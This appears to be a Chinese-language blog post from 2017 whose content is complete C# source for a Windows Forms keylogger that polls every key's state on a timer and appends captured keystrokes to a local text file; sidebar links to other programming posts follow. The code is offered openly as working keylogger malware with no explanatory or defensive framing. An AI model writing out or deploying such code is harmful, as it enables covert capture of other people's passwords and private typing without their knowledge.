using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
namespace keylogger
{
public partial class Form1 : Form
{
[DllImport("User32.dll")]
private static extern short GetAsyncKeyState(int vkey);
public Form1()
{
InitializeComponent();
timer1.Start();
}
string text = "";
private void timer1_Tick(object sender, EventArgs e)
{
string buffer = "";
foreach (System.Int32 i in Enum.GetValues(typeof(Keys)))
{
if (GetAsyncKeyState(i) == -32767)
{
buffer += Enum.GetName(typeof(Keys), i);
}
}
text += buffer;
if (text.Length > 10)
{
writeTotext(text);
text = "";
}
}
private void writeTotext(string value)
{
StreamWriter stram = new StreamWriter("Pokus.txt", true);
stram.Write(value);
stram.Close();
}
}
}
2017年12月21日 星期四
訂閱:
張貼留言 (Atom)
WPF聊天室应用(ASP.NET Core SignalR)
WPF聊天室应用(ASP.NET Core SignalR) https://www.bilibili.com/video/BV1Q741187Si?p=2 https://www.bilibili.com/video/BV1UV411e75T?from=search...
-
https://dotblogs.com.tw/v6610688/2015/02/19/iis_office_access_word_excel_com_interop_api_configuration https://dotblogs.com.tw/gelis/archi...
-
key: Network Sniffer in .NET https://www.google.com/search?q=Network+Sniffer+in+.NET&oq=Network+Sniffer+in+.NET&aqs=chrome..69i57...
-
https://www.twblogs.net/a/5c46a628bd9eee35b21efde4 在界面輸入時,有時需要限定輸入法。 在不自定義正則表達式或者其它輸入處理的情況下,切換中英文時與當前語言欄匹配,有以下的幾種系統方案: InputLanguage方案 使用 ...
沒有留言:
張貼留言